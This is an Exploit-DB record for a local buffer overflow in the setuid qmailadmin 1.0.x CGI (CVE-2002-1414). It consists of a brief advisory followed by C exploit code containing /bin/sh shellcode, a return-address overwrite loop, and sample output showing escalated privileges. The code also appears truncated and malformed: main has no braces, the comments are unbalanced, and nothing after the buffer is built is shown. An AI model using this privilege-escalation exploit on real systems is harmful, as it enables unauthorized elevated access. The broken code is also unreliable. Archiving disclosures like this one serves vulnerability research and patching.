qmailadmin 1.0.x - Local Buffer Overflow Vulnerability

ID EDB-ID:21683
Type exploitdb
Reporter Thomas Cannon
Modified 2002-08-06T00:00:00


qmailadmin 1.0.x Local Buffer Overflow Vulnerability. CVE-2002-1414. Local exploit for linux platform

                                            source: http://www.securityfocus.com/bid/5404/info

The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. 

It is likely that this can be exploited by malicious local users to elevate privileges.

/* http://www.badc0ded.com (bug found by Thomas Cannon)
 / bash-2.05a$ ./qmailadmin-exp
 / Content-Type: text/html
 / $ id
 / uid=1000(dim) euid=89(vpopmail) gid=1000(dim) egid=89(vchkpw) groups=89(vchkpw), 1000(dim), 0(wheel)
 / $ 

char shellcode[]=          /* 23 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x54"                 /* pushl   %esp                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xcd\x80"             /* int     $0x80                  */

main ()
   char buf[16000];
   int i;

   for (i=0;i<=2203;i++)
     strcat(buf,"\xd8\xef\x06\x08");   // lang_fs magic..
   strcat (buf,"\xf1\xcb\xbf\xbf");	// ret..